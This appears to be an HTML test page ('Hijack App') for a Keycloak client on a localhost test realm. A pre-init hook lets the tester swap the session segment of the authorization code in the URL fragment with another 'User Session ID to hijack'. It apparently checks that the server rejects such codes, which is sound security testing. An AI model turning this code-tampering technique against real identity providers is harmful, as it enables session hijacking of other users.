client2.html
<html lang="en">
<head>
<title>Welcome to Hijack App</title>
<script src="keycloak.js"></script>
<script>
// Adapter instance shared by every handler on this page. The settings point at
// a local test deployment: a plain-HTTP server on localhost:8080, realm "test",
// with this page acting as client "client2".
const keycloak = new Keycloak(
  {
    clientId: 'client2',
    realm: 'test',
    url: 'http://localhost:8080',
  },
);
/**
 * Test hook that runs before the adapter is initialised and lets the tester
 * edit the authorization code delivered in the URL fragment.
 *
 * The code is treated as dot-separated; the prompt labels its second segment
 * the "User Session ID". A non-empty answer replaces that segment, and the
 * fragment is rewritten with a `sessionIdAdjusted` marker so a fragment that
 * was already edited is not prompted for again.
 *
 * NOTE(review): what this page exercises is a server-side property. A code
 * whose session segment was swapped should be rejected at the token exchange;
 * if the exchange still succeeds, the authorization server is not binding the
 * code to the session that issued it, and that is the condition to fix.
 */
function preInitHook() {
  const params = new URLSearchParams(window.location.hash.substring(1));
  // Debug output. When a callback is being handled this includes the
  // authorization code, so the console is not a safe place to share from.
  console.log(params);

  // Nothing to do without a code, or when this fragment was already rewritten.
  const alreadyAdjusted = params.has('sessionIdAdjusted');
  if (!params.has('code') || alreadyAdjusted) {
    return;
  }

  const [head, currentSessionId, ...tail] = params.get('code').split('.');
  const replacement = prompt(`Current User Session ID is:\n${currentSessionId}\nUser Session ID to hijack (leave empty to do not override):`);
  if (!replacement) {
    // Empty answer or cancelled dialog: keep the code exactly as received.
    return;
  }

  params.set('code', [head, replacement, ...tail].join('.'));
  params.set('sessionIdAdjusted', 'true');
  window.location.hash = `#${params.toString()}`;
}
/**
 * Page entry point, wired to the body onLoad attribute.
 *
 * Runs preInitHook() first so the callback fragment can be edited before the
 * adapter reads it, then initialises the adapter and reports the outcome in
 * the #result and #user elements.
 */
function initKeycloak() {
  preInitHook();

  const initOptions = {
    // Force a login redirect when the visitor has no session yet.
    onLoad: 'login-required',
    // Turn off the adapter's login-status iframe for this test page.
    checkLoginIframe: false,
  };

  keycloak
    .init(initOptions)
    .then((authenticated) => {
      const resultNode = document.getElementById('result');
      resultNode.textContent = authenticated ? 'authenticated' : 'not authenticated';
      if (!authenticated) {
        return;
      }
      // textContent keeps the username from the ID token rendered as plain
      // text rather than markup.
      const userNode = document.getElementById('user');
      userNode.textContent = keycloak.idTokenParsed.preferred_username || '';
    })
    .catch((error) => {
      console.error(error);
      const resultNode = document.getElementById('result');
      resultNode.textContent = 'failed to initialize';
    });
}
/**
 * Click handler for the Logout button: asks the adapter to log the user out.
 * Whatever the adapter call returns is discarded; the handler returns nothing.
 */
function logout() {
  void keycloak.logout();
}
</script>
</head>
<body onLoad="initKeycloak()">
<div id="result"></div>
<div id="user"></div>
<button onClick="logout()">Logout</button>
</body>
</html>